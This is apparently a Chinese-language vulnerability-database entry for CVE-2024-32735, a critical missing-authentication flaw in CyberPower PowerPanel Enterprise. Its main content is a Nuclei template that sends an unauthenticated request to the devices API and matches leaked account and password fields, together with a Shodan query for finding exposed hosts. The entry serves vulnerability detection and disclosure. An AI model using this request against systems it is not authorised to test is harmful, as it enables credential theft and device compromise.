CVE-2024-32735: CyberPower - Missing Authentication

日期: 2025-08-01 | 影响软件: CyberPower | POC: 已公开

漏洞描述

An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3.

PoC代码[已公开]

id: CVE-2024-32735

info:
  name: CyberPower - Missing Authentication
  author: DhiyaneshDK
  severity: critical
  description: |
    An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3.
  impact: |
    An unauthenticated remote attacker can access the PDNU REST APIs, which may result in compromise of the application.
  reference:
    - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote
    - https://www.tenable.com/security/research/tra-2024-14
    - https://nvd.nist.gov/vuln/detail/CVE-2024-32735
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-32735
    cwe-id: CWE-306
    epss-score: 0.74365
    epss-percentile: 0.98803
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"<title>PDNU</title>"
  tags: cve,cve2024,cyberpower,auth-bupass,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/devices"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"account":'
          - '"passwd":'
          - 'status":"success'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009d19c8e6ac534a6e5848550863070da9135d6b148565d6ad0211ac30cebe76ba02200115355d47f3bdf41a26e5f8f1d09727bd419bfef8496f5fd1cb937f02441ba4:922c64590222798bb761d5b6d8e72950

相关漏洞推荐